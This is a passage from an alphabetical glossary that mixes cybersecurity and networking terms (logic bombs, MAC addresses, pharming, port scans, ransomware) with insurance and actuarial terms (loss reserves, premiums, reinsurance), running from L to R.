List Based Access Control associates a list of users and their privileges with each object, such as a file directory or individual file. Each object has a security attribute that identifies its access control list. The list has an entry for each system user with access privileges. This list is implemented differently by each operating system.
LKM
A loadable kernel module (LKM) is an object file that contains code to extend the running kernel, or base kernel, of an operating system. LKMs are usually used to add support for new hardware and/or file systems, and even for adding system calls.
Loadable Kernel Modules
A loadable kernel module (LKM) is an object file that contains code to extend the running kernel, or base kernel, of an operating system. LKMs are usually used to add support for new hardware and/or file systems, and even for adding system calls.
Log Clipping
Log clipping is the selective removal of log entries from a system log to hide a compromise.
Logic Bomb
A logic bomb is a piece of malicious code intentionally inserted into a software system that will run when specified conditions are met.
Logic Bombs
A logic bomb is a piece of code that is deliberately inserted into a system to trigger a malicious program. Viruses and worms often contain logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. Some viruses attack their host systems on specific dates, such as Friday the 13th or April Fools' Day. Trojans that activate on certain dates are often called time bombs.
Logic Gate
A logic gate is an elementary building block of a digital circuit. This device is used to implement a Boolean function. It performs a logical operation on one or more logical inputs and produces a single logical output.
Loopback Address
A loopback address is a pseudo address that sends outgoing signals back to the same computer for testing. In a TCP/IP network, the loopback IP address is 127.0.0.1, and pinging this address always returns a reply unless the firewall prevents it.
Loss Adjustment Expense (LAE)
Expected payments for costs to be incurred in connection with the adjustment and recording of losses. Can be classified into two broad categories: Defense and Cost Containment (DCC) and Adjusting and Other (AO). Can also be separated into Allocated Loss Adjustment Expense and Unallocated Loss Adjustment Expense for ratemaking purposes.
Loss of Frequency
Incidence of claims on a policy during a premium period.
Loss of Payable Clause
Coverage for third party mortgage in case of default on insured property, secured by a loan, that has been lost or damaged.
Loss of Use Insurance
Policy providing protection against loss of use due to damage or destruction of property.
Loss Ratio
The percentage of incurred losses to earned premiums.
Loss Reserve
The amount that insurers set aside to cover claims that have been incurred but have not yet been paid.
Loss Reserves
An estimate of liability or provision in an insurer's financial statement, indicating the amount the insurer expects to pay for losses incurred but not yet reported or reported claims that haven't been paid.
Losses Incurred
Includes claims that have been paid and/or have amounts held in reserve for future payment.
Losses Incurred but Not Reported
An estimated amount set aside by the insurance company to pay claims that may have occurred but, for some reason, have not yet been reported to the insurance company.
M
MAC
Mandatory Access Control (MAC) is a security approach that constrains the ability of an individual resource owner to grant or deny access to resources or files on the system. Whenever a user tries to access an object, an authorization rule is enforced by the OS. The kernel examines these security attributes and decides whether the user may access the object. Any operation by any user is typically tested against a set of authorization rules (also called a policy) to determine whether the operation is allowed.
MAC Address
Media access control address (MAC address) of a device is a unique identifier assigned to a network interface.
Media access control address
Media access control address (MAC address) of a device is a unique identifier assigned to a network interface.
MAC Address
A Media Access Control address (MAC address) is also known as the physical address and is a unique identifier assigned to the network interface for communication. MAC addresses are generally used as a network address for most IEEE 802 network technologies (including Ethernet and Wi-Fi). MAC addresses are used in the media access control protocol sub-layer of the OSI reference model.
Malicious Code
Malicious code is any code in any part of a software system or script that is intended to cause undesired effects, security breaches, or damage to a system. Such code gains unauthorized access to system resources or tricks a user into executing other malicious logic. Malicious code describes a broad category of system security terms that includes attack scripts, viruses, worms, Trojan horses, backdoors, and malicious active content.
Malware
Malware is a contraction of malicious and software. Malware is any piece of software written to harm data, devices, or people. This includes viruses, worms, trojans, spyware, and ransomware.
Mandatory Access Control
Mandatory Access Control (MAC) is a security approach that constrains the ability of an individual resource owner to grant or deny access to resources or files on the system. Whenever a user tries to access an object, an authorization rule is enforced by the OS. The kernel examines these security attributes and decides whether the user may access the object. Any operation by any user is typically tested against a set of authorization rules (also called a policy) to determine whether the operation is allowed.
Manufacturers Output Policies
Provides broad form coverage of personal property of an insured manufacturer including raw material, goods in process, finished goods and goods shipped to customers.
Margin Premium
A deposit an organization must maintain with a broker regarding the Futures Contracts purchased or sold.
Market Value
Fair value or the price that could be derived from current sale of an asset.
Masquerade Attack
A masquerade attack is any attack that uses a forged identity (such as a network identity) to gain unofficial access to a personal or organizational computer. Masquerade attacks are generally performed using stolen passwords and logons, by locating gaps in programs, or by finding a way around the authentication process. Such attacks are triggered either by someone within the organization or by an outsider if the organization is connected to a public network.
MD5
MD5 was designed by Professor Ronald L. Rivest of MIT in 1991. The MD5 message-digest algorithm is the most widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32-digit hexadecimal number. It was developed to be used with digital signature applications that require large files to be compressed by a secure method before being encrypted with a secret key, under a public key cryptosystem. MD5 is specified in Internet Engineering Task Force (IETF) Request for Comments (RFC) 1321.
MDM
Mobile device management (MDM) is an industry term for the administration of mobile devices, such as smartphones, tablet computers, laptops, and desktop computers.
Measures of Effectiveness
Measures of Effectiveness (MOE) is a probability model based on engineering concepts that allows one to estimate the impact of a given action on an environment. MOE quantifies the results to be obtained by a system and may be expressed as probability that the system will perform as required.
MFA
Multi-factor authentication (MFA) is a method of confirming a user's claimed identity only after presenting two or more pieces of evidence across three main categories: what you know, what you have and what you are.
Minimum Premium Plan
An arrangement under which an insurance carrier will, for a fee, handle the administration of claims and insure against large claims for a self-insured group. The employer self-funds a fixed percentage (e.g., 90%) of the estimated monthly claims, and the insurer covers the remainder.
Mobile Device Management
Mobile device management (MDM) is an industry term for the administration of mobile devices, such as smartphones, tablet computers, laptops, and desktop computers.
Mobile Device Security
Mobile device security refers to the policies, procedures, and tools for securing mobile devices.
Mobile Phone Malware
Mobile phone malware is malware intended to run on mobile devices, such as smartphones or PDAs.
Modified Guaranteed
An annuity that contains a provision that adjusts the value of withdrawn funds based on a formula in the contract. The formula reflects market value adjustments.
MOE
Measures of Effectiveness (MOE) is a probability model based on engineering concepts that allows one to estimate the impact of a given action on an environment. MOE quantifies the results to be obtained by a system and may be expressed as probability that the system will perform as required.
Monoculture
Monoculture is a situation in which many users run the same software and are therefore vulnerable to the same attacks.
Moral Hazard
Personality characteristics that increase the probability of losses. For example, not taking proper care to protect insured property because the insured knows the insurance company will replace it if it is damaged or stolen.
Morris Worm
The Morris Worm (or Internet worm) program was written by a graduate student at Cornell University, Robert Tappan Morris, and launched on November 2, 1988, from MIT. It was the first computer worm distributed via the Internet and gained significant mainstream media attention.
Multi-Cast
An IP multi-cast is a method of sending packets of data to a group of receivers in a single transmission. This method is often used to stream media applications on the Internet and private networks.
Multi-Factor Authentication
Multi-factor authentication (MFA) is a method of confirming a user's claimed identity only after presenting two or more pieces of evidence across three main categories: what you know, what you have and what you are.
Multi-Homed
A multi-homed host is any computer host that has multiple IP addresses on connected networks. A multi-homed host is physically connected to multiple data links that can be on the same or different networks. Multihoming is commonly used in Web management for load balancing, redundancy, and disaster recovery.
Multi-Peril Insurance
Personal and business property coverage combining several types of property insurance in one policy.
Multiplexing
Multiplexing is a technique by which multiple analog or digital data streams are combined into one signal over a shared medium. Multiplexing originated in telegraphy in the 1870s and is now widely applied in communications. The multiplexed signal is transmitted over a communication channel, such as a cable. A reverse process, known as demultiplexing, extracts the original channels on the receiver end.
Municipal Body Guarantee Insurance
Coverage sold to municipalities to guarantee the principal payment on bonds issued.
Municipal Liability
Liability coverage for the acts of a municipality.
Municipal Obligation Bond
Any security, or other instrument, including a state lease but not a lease of any other governmental entity, under which a payment obligation is created, issued by or on behalf of a governmental unit to finance a project servicing a substantial public purpose, and 1) Payable from tax revenues, but not tax allocations, within the jurisdiction of such governmental unit; 2) Payable or guaranteed by the United States of America or any agency, department or instrumentality thereof, or by a state housing agency; 3) Payable from rates or charges (but not tolls) levied or collected in respect of a non-nuclear utility project, public transportation facility (other than an airport facility) or public higher education facility; or 4) With respect to lease obligations, payable from future appropriations.
Mutual Insurance Company
A privately held insurer owned by its policyholders, operated as a non-profit that may or may not be incorporated.
Mutual Insurance Holding Company
A company organized as a mutual and owning a capital stock insurer or insurers for the benefit of pooling risk for many people, typically those in the same industry.
N
NAC
Network Access Control (NAC) solutions help organizations control access to their networks.
Named Insurance
The individual defined as the insured in the policy contract.
Named Peril Coverage
Insurance for losses explicitly defined in the policy contract.
NAT
Network Address Translation (NAT) is an approach that is used to remap one IP address space into another by modifying network address information in IP datagram packet headers while they are in transit. This technique was originally used for rerouting traffic in IP networks without renumbering every host. Typically, home or small business networks use NAT to share a single DSL or cable modem IP address. However, in some cases NAT is used for servers as an additional layer of protection.
National Association of Insurance Commissioners (NAIC)
The U.S. standard-setting and regulatory support organization created and governed by the chief insurance regulators from the 50 states, the District of Columbia and five U.S. territories. Through the NAIC, state insurance regulators establish standards and best practices, conduct peer review, and coordinate their regulatory oversight. NAIC staff supports these efforts and represents the collective views of state regulators domestically and internationally. NAIC members, together with the central resources of the NAIC, form the national system of state-based insurance regulation in the U.S.
National Institute of Standards and Technology
The National Institute of Standards and Technology (NIST) is a non-regulatory federal agency within the U.S. Department of Commerce. NIST’s mission is to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.
Nationally Recognized Statistical Rating Organization (NRSRO)
Refers to rating organizations so designated by the SEC whose status has been confirmed by the Securities Valuation Office. Examples are Moody's Investors Service, Inc., Standard & Poor's (S&P), A.M. Best Company (A.M. Best), Fitch Ratings, and Dominion Bond Rating Service (DBRS).
Natural Disaster
Natural disasters are any act of God or natural event caused by environmental factors. Examples include fire, flood, earthquake, lightning, or wind; such an event disables the system, part of it, or a network of systems.
Negligence
Failure to exercise reasonable consideration resulting in loss or damage to oneself or others.
Net Admitted Assets
Total of assets whose values are permitted by state law to be included in the annual statement of the insurer.
Net Income
Total revenues from an insurer's operations less total expenses and income taxes.
Net Premiums Earned
Premiums on property/casualty or health policies that will not have to be returned to the policyholder if the policy is cancelled.
Netmask
A netmask is a string of 0’s and 1’s that screens out the network part of an IP address so that only the host part of the address remains. The binary 1’s at the beginning of the mask correspond to the network ID part of the IP address, and the binary 0’s that follow correspond to the host ID. In every subnet, two host values are always reserved. For example, with the mask 255.255.255.0, the host value 0 is the assigned network address and the host value 255 is the assigned broadcast address. The 0 and 255 are always reserved and cannot be assigned to hosts.
Network Access Control
Network Access Control (NAC) solutions help organizations control access to their networks.
Network-Based IDS
Network-based Intrusion Detection Systems (NIDS) are placed at a strategic point (or points) to monitor the traffic on the network. A NIDS analyses the passing traffic on the entire subnet and matches the traffic that is passed on the subnets against a library of known attacks. When an attack is identified, or abnormal behavior is detected, an alert is sent to the administrator. OPNET and NetSim are commonly used tools for simulating network intrusion detection systems.
Network Infrastructure
The mix of hardware and software resources of a network that enable network connectivity, communication, operations, and management of the network.
Network Mapping
Network mapping is the study of physical connectivity of networks. It is used to compile an electronic inventory of the systems and the services on any network. With the increase in complexities of networks, automated network mapping has become more popular.
Network Segregation
A method of splitting a network into separate subnetworks, segments, or zones, which provides security benefits.
Network Taps
Network taps are hardware devices that provide access to the data flowing across a computer network. They allow a third party to monitor the traffic between two points in the network. The network tap has (at least) three ports: an A port, a B port, and a monitor port. Network taps are generally used for network intrusion detection systems, VoIP recording, network probes, RMON probes, packet sniffers, and other monitoring and collection devices and software that require access to a network segment.
NIST
The National Institute of Standards and Technology (NIST) is a non-regulatory federal agency within the U.S. Department of Commerce. NIST’s mission is to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.
Non-Admitted Assets
Assets having economic value other than those which can be used to fulfill policyholder obligations, or those assets which are unavailable due to encumbrances or other third-party interests and should not be recognized on the balance sheet.
Non-Admitted Insurer
Insurance company not licensed to do business within a given state.
Non-Controlled Stock Insurers
Insurers in which a parent company 1) has a financial interest represented by the direct or indirect ownership of less than 50% of voting shares, and 2) does not have the ability to exercise control over the insurer, e.g., through voting stock or management contract.
Non-Printable Character
A Non-Printable Character is a character that has no corresponding printable letter or symbol for its ASCII code. Examples are the Linefeed, ASCII character code 10 decimal; the Carriage Return, decimal 13; and the bell, decimal 7. On a PC, you can often enter non-printable characters by holding down the Alt key and typing in the decimal value (e.g., Alt-007 gives you a bell). There are other character encoding schemes, but ASCII is the most prevalent.
Non-Repudiation
Non-Repudiation refers to the ability of a system to prove that a specific user and only that specific user sent a message and that it hasn’t been modified. On the Internet, a digital signature is used not only to ensure that a message or document has been electronically signed by the person, but also, since a digital signature can only be created by one person, to ensure that a person cannot later deny that they furnished the signature.
Notional Value
The principal value on which future payments are based in a derivative transaction, as of a specific date (the "as of" reporting date), in the reporting currency.
Null Session
A Null session is also known as Anonymous Logon. It is a method that allows an anonymous user to retrieve information such as usernames and shares over the network, or to connect without authentication. Null sessions are one of the most commonly used methods for network exploration employed by “hackers.” A null session connection allows you to connect to a remote machine without using a username or password. Instead, you are given anonymous or guest access.
O
Octet
An octet is a unit of digital information that consists of eight bits. Octets are generally displayed using a variety of representations, for example in the hexadecimal, decimal, or octal number systems. The binary value of all 8 bits set (or turned on) is 11111111, equal to the hexadecimal value FF, the decimal value 255, and the octal value 377. One octet can be used to represent decimal values ranging from 0 to 255.
One-Way Encryption
One-way encryption, or a one-way hash function, is designed so that it is hard to reverse the process, that is, to find a string that hashes to a given value (hence the name one-way). A good hash function also makes it hard to find two strings that produce the same hash value.
One-Way Function
A one-way function is any function that is easy to compute on every input, but hard to invert given the image of a random input.
Open Shortest Path First
Open Shortest Path First (OSPF) is a routing protocol for IP networks that uses a link-state routing algorithm. It falls into the group of interior routing protocols, operating within a single autonomous system (AS). OSPF is the most common interior gateway protocol (IGP) in large enterprise networks.
Open Source
A type of software whose source code is made freely available to anyone to study, modify, and distribute. This means that the code can be viewed and altered by anyone, and the resulting software is often distributed for free. Examples of open-source code are Bitcoin, Mozilla Firefox, Joomla, and WordPress.
Operating system
An operating system (OS) is system software that manages a computer’s resources and processes. It is also responsible for the computer’s ability to run and execute programs. Operating systems enable you to communicate with your computer without needing to speak your computer’s language.
Option
An agreement giving the buyer the right to buy or receive, sell, or deliver, enter into, extend, or terminate, or effect a cash settlement based on the actual or expected price, level, performance, or value of one or more Underlying Interests.
OSI
OSI stands for Open System Interconnection and is an ISO standard for worldwide communications. OSI defines a networking framework for implementing protocols in seven layers. OSI defines seven layers of functions that take place at each end of a communication. Although OSI is not always strictly adhered to in terms of keeping related functions together in a well-defined layer, many products involved in telecommunication attempt to describe themselves in relation to the OSI model.
OSI Layers
The Open System Interconnection (OSI) model defines a networking framework to implement protocols in seven layers. Control is passed from one layer to the next, starting at the application layer in one station, and proceeding to the bottom layer, over the channel to the next station and back up the hierarchy. The OSI model takes the task of internetworking and divides that up into what is referred to as a vertical stack that consists of the following layers.
OSPF
Open Shortest Path First (OSPF) is a routing protocol for IP networks that uses a link-state routing algorithm. It falls into the group of interior routing protocols, operating within a single autonomous system (AS). OSPF is the most common interior gateway protocol (IGP) in large enterprise networks.
Other Underwriting Expenses
Allocable expenses other than loss adjustment expenses and investment expenses.
Overload
Overload is the limitation of system operation by excessive burden on a system component's performance capabilities.
P
Package Policy
Two or more distinct policies combined into a single contract.
Packet
A packet is a term used to describe a segment of data sent from one computer or device to another over a network.
Packet Switched Network
A packet switched network (PSN) is a computer communications network that groups and sends data in the form of small packets. It enables sending of data packets between a source and destination node over a channel that is shared between multiple users and/or applications. A packet switched network is also known as a connectionless network, as it does not create a permanent connection between a source and destination node.
PAP
Password Authentication Protocol (PAP) is the most basic form of authentication in which a user’s name and password are transmitted over a network and compared to a table of name-password pairs. The basic authentication feature built into the HTTP protocol uses PAP.
Par Value
The nominal or face value of a stock or bond.
Parasitic Viruses
Parasitic viruses, also known as file viruses, spread by attaching themselves to programs.
Partitions
Partitioning is the division of a computer hard disk or other secondary storage into one or more regions. Many computers have hard disk drives with only a single partition, but others have multiple partitions so that an OS can manage information in each region separately. Each partition then appears in the OS as a distinct logical disk that uses part of the actual disk.
Passive Attack
A passive attack is a network attack in which a system is monitored and sometimes scanned for open ports and vulnerabilities. The purpose is solely to gain information about the target and no data is changed on the target.
Password Authentication Protocol
Password Authentication Protocol (PAP) is the most basic form of authentication in which a user’s name and password are transmitted over a network and compared to a table of name-password pairs. The basic authentication feature built into the HTTP protocol uses PAP.
Password Cracking
Password cracking is the process of trying to guess or crack passwords to gain access to a computer system or network. Crackers generally use a variety of tools, scripts, or software to crack a system password. Password cracks work by comparing every encrypted dictionary word against the entries in the system password file until a match is found.
Password Sniffing
Password sniffing is a technique used to gain knowledge of passwords that involves monitoring traffic on a network to pull out information. Several software tools are available for automatic password sniffing.
Patch
A patch is a set of changes to software, or its supporting data designed to update, fix, or improve it.
Patching
Patching is the process of updating software to a different version. It is also referred to as updating the software to the latest version available and is key in removing bugs of the previous version.
Payload
The payload is the part of transmitted data that contains the intended message.
Penetration
Penetration is defined as gaining unauthorized logical access to sensitive data by evading a system’s protections.
Penetration Testing
A security assessment method to test, measure, and enhance established security measures on information systems.
Peril
The cause of property damage or personal injury; the origin of the desire for insurance. Also called "cause of loss".
Permutation
Permutation is a technique that keeps the same letters but changes their positions within a text to scramble the message.
Personal Firewall
Personal firewalls are those firewalls that are installed and run on individual computers. A personal firewall is an application which controls network traffic to and from a computer, permitting or denying communications based on a security policy. Typically, it works as an application layer firewall.
Personal GAP Insurance
Credit insurance that insures the excess of the outstanding indebtedness over the primary property insurance benefits in the event of a total loss to a collateral asset.
Personal Property
Single interest or dual interest credit insurance (where collateral is not a motor vehicle, mobile home, or real estate) that covers perils to goods purchased or used as collateral and that concerns a creditor's interest in the purchased goods or pledged collateral either in whole or in part; or covers perils to goods purchased in connection with an open-end credit transaction.
Pharming
Pharming is defined as a cyber-attack that is intended to redirect a website’s traffic to a masquerading website, which may be a fake one. Pharming is achieved by corrupting a DNS server on the Internet and steering a URL to the masked website’s IP. Generally, all users use a URL like www.worldbank.com instead of the real IP (192.86.99.140) of the website. The URL can be redirected to send traffic to the IP of the pseudo website by substituting the pointers on a DNS server. The transactions can be imitated and information like login credentials can be gathered at the pseudo site. Using the information gathered, the attacker can access the real site and conduct transactions using the credentials of a valid user.
Phishing
Phishing is a method of trying to gather sensitive information using deceptive emails and websites.
Phishing Emails
Phishing refers to the process of deceiving recipients into sharing sensitive information with an unknown third party (cybercriminal).
Ping of Death
A ping of death is an attack that involves sending a distorted or otherwise malicious ping to a computer with the intent of overflowing the input buffers of the destination machine and causing it to crash. A ping of death is fragmented into groups of 8 octets before transmission.
Ping Sweep
A ping sweep is also known as an ICMP sweep. It is a basic network scanning technique used to determine which of a range of IP addresses maps to live network hosts.
Ping Scan
A ping scan looks for machines that are responding to ICMP Echo Requests.
Plaintext
In cryptography, plaintext or cleartext is unencrypted information.
Point-to-Point Protocol
Point-to-Point Protocol (PPP) is a communication protocol between two computers that uses a serial interface, typically a personal computer connected by a phone line to a server. PPP uses the Internet protocol (IP) and is sometimes considered a member of the TCP/IP suite of protocols.
Point-to-Point Tunneling Protocol
The Point-to-Point Tunneling Protocol (PPTP) is an approach used to implement virtual private networks (VPN). PPTP uses a control channel over TCP and a GRE tunnel to encapsulate PPP packets.
Poison Reverse
Poison reverse is a method where a gateway node communicates to its neighbor gateways that one of the gateways is no longer connected. The notifying gateway sets the number of hops to the unconnected gateway to a number that indicates “infinite,” in effect advertising that the route is not reachable.
Policy
A written contract ratifying the legality of an insurance agreement.
Policy Dividend
A refund of part of the premium on a participating life insurance policy. The amount of payment is determined by subtracting the actual premium expense from the premium charged. The payment can be taken as cash, applied to purchase an increment of paid-up insurance, left on deposit with the insurance company, or applied to purchase term insurance for one year.
Policy Period
Time period during which insurance coverage is in effect.
Policy Reserve
The amount of money allocated specifically for the fulfillment of policy obligations by a life insurance company; reserves are in place to safeguard that the company can pay all future claims.
Policyholders Surplus
Assets in excess of the liabilities of a company or net income above any monies indebted to legal obligation.
PPP
Point-to-Point Protocol (PPP) is a communication protocol between two computers that uses a serial interface, typically a personal computer connected by a phone line to a server. PPP uses the Internet protocol (IP) and is sometimes considered a member of the TCP/IP suite of protocols.
PPTP
The Point-to-Point Tunneling Protocol (PPTP) is an approach used to implement virtual private networks (VPN). PPTP uses a control channel over TCP and a GRE tunnel to encapsulate PPP packets.
PSN
A packet switched network (PSN) is a computer communications network that groups and sends data in the form of small packets. It enables sending of data packets between a source and destination node over a channel that is shared between multiple users and/or applications. A packet switched network is also known as a connectionless network, as it does not create a permanent connection between a source and destination node.
PERL
Perl is a family of high-level, general-purpose, dynamic programming languages. These languages include Perl 5 and Perl 6. Perl was originally developed by Larry Wall in 1987 as a general-purpose Unix scripting language.
PFS
Public-Key Forward Secrecy (PFS) is a key agreement protocol based on asymmetric cryptography. It ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future.
PGP
Pretty Good Privacy (PGP) is a trademarked data encryption and decryption program. This program provides cryptographic privacy and authentication for data communication. It was created by Phil Zimmermann in 1991. PGP is generally used for encrypting and decrypting texts, e-mails, files, directories, and whole disk partitions, and to increase the security of e-mail communications.
PKI
Public Key Infrastructure (PKI) supports the identification and distribution of public encryption keys.
Polyinstantiation
Polyinstantiation is the ability of a database to maintain multiple records with the same key. It is used to prevent inference attacks. It may also indicate, as in the case of database polyinstantiation, that two different instances have the same name (identifier, primary key).
Polymorphism
Polymorphism is the process where malicious software changes its underlying code to avoid detection. A polymorphic type is one whose operations can also be applied to values of some other type, or types.
POP3
Post Office Protocol, Version 3 (POP3) is an Internet Standard protocol through which a client workstation can access a mailbox on a server host to retrieve mail messages that the server has received and is holding for the client.
Port
A port is an end point of communication in an operating system. It is identified for each address and protocol by a 16-bit number, commonly known as the port number.
Port Scan
A port scan is a sequence of messages sent by an attacker attempting to break into a computer. Port scanning provides the attacker with an idea where to probe for weaknesses. A port scan consists of sending a message to each port, one at a time.
Possession
Possession is the holding, control, and ability to use information.
Post Office Protocol Version 3
Post Office Protocol, Version 3 (POP3) is an Internet Standard protocol through which a client workstation can access a mailbox on a server host to retrieve mail messages that the server has received and is holding for the client.
Potentially Unwanted Application
Potentially unwanted applications are programs that are not malicious but may be unsuitable for use in a business environment and may create security concerns.
Practical Extraction and Reporting Language
Perl is a family of high-level, general-purpose, dynamic programming languages. These languages include Perl 5 and Perl 6. Perl was originally developed by Larry Wall in 1987 as a general-purpose Unix scripting language.
Preamble
Pretty Good Privacy
Pretty Good Privacy (PGP) is a trademarked data encryption and decryption program. This program provides cryptographic privacy and authentication for data communication. It was created by Phil Zimmermann in 1991. PGP is generally used for encrypting and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications.
Preferred Provider Organization (PPO)
An arrangement, insured or uninsured, in which contracts are established by Health Plan Companies (typically commercial insurers and, in some circumstances, self-insured employers) with health care providers. The Health Plans involved will often designate these contracted providers as "preferred" and will provide an incentive, usually in the form of lower deductibles or co-payments, to encourage covered individuals to use these providers. Members are allowed benefits for non-participating provider services on an indemnity basis with significant copayments, and providers are often, but not always, paid on a discounted fee-for-service basis.
Preferred Risk
Insured, or applicant for insurance, who presents likelihood of risk lower than that of the standard applicant.
Premium
Money charged for insurance coverage; it reflects the expectation of loss.
Premiums Earned
The portion of premium for which the policy protection or coverage has already been given during the now-expired portion of the policy term.
Premiums Net
The amount calculated on the basis of the interest and mortality table used to calculate the reporting entity's statutory policy reserves.
Premiums Written
Total premiums generated from all policies (contracts) written by an insurer within a given period.
Primary Insurance
Coverage that takes precedence when more than one policy covers the same loss.
Prior Approval Law
A state regulatory requirement for pre-approval of all insurance rates and forms.
Private Addressing
IANA has set aside three address ranges for use by private or non-Internet-connected networks. This is referred to as Private Address Space and is defined in RFC 1918. The reserved address blocks are: 10.0.0.0 to 10.255.255.255 (10/8 prefix); 172.16.0.0 to 172.31.255.255 (172.16/12 prefix); 192.168.0.0 to 192.168.255.255 (192.168/16 prefix).
Producer
An individual who sells, services, or negotiates insurance policies either on behalf of a company or independently.
Product Liability
Insurance coverage protecting the manufacturer, distributor, seller, or lessor of a product against legal liability resulting from a defective condition causing personal injury, or damage, to any individual or entity, associated with the use of the product.
Professional Errors and Omissions Liability
Coverage available to pay for liability arising out of the performance of professional or business-related duties, with coverage being tailored to the needs of the specific profession. Examples include abstracters, accountants, insurance adjusters, architects, engineers, insurance agents and brokers, lawyers, real estate agents, stockbrokers.
Programming
A technological process for telling a computer which tasks to perform to solve problems. You can think of programming as a collaboration between humans and computers, in which humans create instructions for a computer to follow (code) in a language the computer can understand.
Program Infector
A program infector is a piece of malware (or virus) that attaches itself to existing program files. Once the original infected program is run the virus transfers to the computer memory and may replicate itself further, spreading the infection. This type of virus can be spread beyond one’s system as soon as the infected file or program is passed to another computer.
Program Policy
A program policy is a high-level policy that sets the overall tone of an organization’s security approach.
Promiscuous Mode
Promiscuous mode allows a network device to intercept and read, in its entirety, each network packet that arrives. This is used by network administrators to diagnose network problems, but also by unsavory characters who are trying to eavesdrop on network traffic (which might contain passwords or other information).
Property
Coverage protecting the insured against loss or damage to real or personal property from a variety of perils, including but not limited to fire, lightning, business interruption, loss of rents, glass breakage, tornado, windstorm, hail, water damage, explosion, riot, civil commotion, rain, or damage from aircraft or vehicles.
Proprietary Information
Proprietary information is information unique to a company and its ability to compete, such as customer lists, technical data, product costs, and trade secrets.
Protected Cell
An insurance-linked security retained within the insurance or reinsurance company that is used to insulate the proceeds of the securities offering from the general business risks of the insurer, granting an additional comfort level for investors in the securitized instrument.
Protocol
A protocol is a special set of rules that end points in a telecommunication connection use when they communicate. Protocols specify interactions between the communicating entities. Protocols exist at several levels in a telecommunication connection.
Protocol Stacks
Protocol Stacks are a set of network protocol layers that work together.
Provisions
Contingencies outlined in an insurance policy.
Proximate Cause
Event covered under insured's policy agreement.
Proxy Server
A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers.
PUA
Potentially unwanted applications are programs that are not malicious but may be unsuitable for use in a business environment and may create security concerns.
Public Adjuster
Independent claims adjuster representing policyholders instead of insurance companies.
Public Key
A Public Key is the publicly disclosed component of a pair of cryptographic keys used for asymmetric cryptography.
Public Key Encryption
Public Key Encryption is also known as asymmetric cryptography. Public key encryption is a cryptographic system that uses two keys: a public key known to everyone, and a private or secret key known only to the recipient of the message.
Public-Key Forward Secrecy
Public-Key Forward Secrecy (PFS) is a key agreement protocol based on asymmetric cryptography. It ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future.
Public Key Infrastructure
Public Key Infrastructure (PKI) supports the identification and distribution of public encryption keys.
Pure Premium
That portion of the premium equal to expected losses void of insurance company expenses, premium taxes, contingencies, or profit margin.
Pure Risk
Circumstance including possibility of loss or no loss but no possibility of gain.
Q
QAZ
QAZ is a network worm.
Qualified Actuary
A person who meets the basic education, experience and continuing education requirements (these differ by line of business) of the Specific Qualification Standard for Statements of Actuarial Opinion, NAIC Property and Casualty Annual Statement, as set forth in the Qualification Standards for Actuaries Issuing Statements of Actuarial Opinion in the United States, promulgated by the American Academy of Actuaries, and is in good standing of the American Academy of Actuaries who has been approved as qualified for signing casualty loss reserve opinions by the Casualty Practice Council of the American Academy of Actuaries.
R
Race Condition
Race Condition is also known as race hazard. Race Condition is the behavior of an electronic, software, or other system where the output is dependent on the sequence or timing of other uncontrollable events. This becomes a bug when events don’t happen in the order the programmer planned. Race conditions can occur in electronics systems, especially logic circuits, and in computer software, especially multithreaded or distributed programs.
Radiation Monitoring
Radiation monitoring is the process of receiving images, data, or audio from an unprotected source by snooping on radiation signals.
Ransomware
A type of malicious software that blocks access to your files or computer until a ransom is paid. However, there's no guarantee that paying a ransom will allow you to unlock your files or computer.
Ransomcloud
A special type of ransomware, designed to encrypt cloud e-mails and attachments.
Rate
Value of insured losses expressed as a cost per unit of insurance.
Rebate
A refund of part or all of a premium payment.
Reconnaissance
Reconnaissance is the phase of an attack in which an attacker locates new systems, maps out networks, and probes for specific vulnerabilities in a system or network. It is also used to obtain information about an attacker's activities and resources by visual observation or other detection methods.
Red Team
A group authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s cybersecurity posture.
Redundancy
An additional system that maintains a degree of overall functionality in case of loss or failure of another system.
Reflexive ACLs (Cisco)
Reflexive access lists are an important part of securing the network against network hackers and are generally included in a firewall defense. Reflexive access lists provide a level of security against spoofing and denial-of-service attacks. Reflexive ACLs for Cisco routers are a step towards making the router act like a stateful firewall: the router makes filtering decisions based on whether connections are part of established traffic or not.
RARP
Reverse Address Resolution Protocol (RARP) is a protocol where a physical machine in a local area network (LAN) can request to learn its IP address from a gateway server’s Address Resolution Protocol (ARP) table or cache. When a new machine is set up, its RARP client program requests from the RARP server on the router to be sent its IP address.
RBC Ratio
A ratio used to identify insurance companies that are poorly capitalized. It is calculated by dividing the company's capital by the minimum amount of capital regulatory authorities have deemed necessary to support the insurance operations.
Registry
The registry is a system-defined database in which applications and system components store and retrieve configuration data. Applications use the registry API to retrieve, modify, or delete registry data.
Regression Analysis
Scripted tests used to verify that software still behaves as expected for the inputs it is expected to handle. Typically, developers create a set of regression tests that are executed before a new version of the software is released.
Reinsurance
A transaction between a primary insurer and another licensed (re)insurer in which the reinsurer agrees to cover all or part of the losses and/or loss adjustment expenses of the primary insurer. The assumption is in exchange for a premium. Indemnification is on a proportional or non-proportional basis.
Reinsurer
Company assuming reinsurance risk.
Remote Access
The ability to access a computer from a remote location.
Renewable Term Insurance
Insurance that is renewable for a limited number of successive terms by the policyholder and is not contingent upon medical examination.
Reported Losses
Expected payments for losses relating to insured events that have occurred and have been reported to the insurance company, but not yet paid.
Request for Comment
A Request for Comments (RFC) is a type of publication from the Internet Engineering Task Force (IETF) and the Internet Society. An RFC is authored by engineers and computer scientists as a memorandum describing methods, behaviors, research, or innovations applicable to the working of the Internet and Internet-connected systems. RFCs started in 1969, when the Internet was the ARPANET.
Reserve
A portion of the premium retained to pay future claims.
Reserve Credit
Reduction of reserve amounts for reinsurance ceded. Reductions may include the claim reserve and/or the unearned premium reserve.
Residual Market Plan
Method devised for coverage of greater than average risk individuals who cannot obtain insurance through normal market channels.
Resource Exhaustion
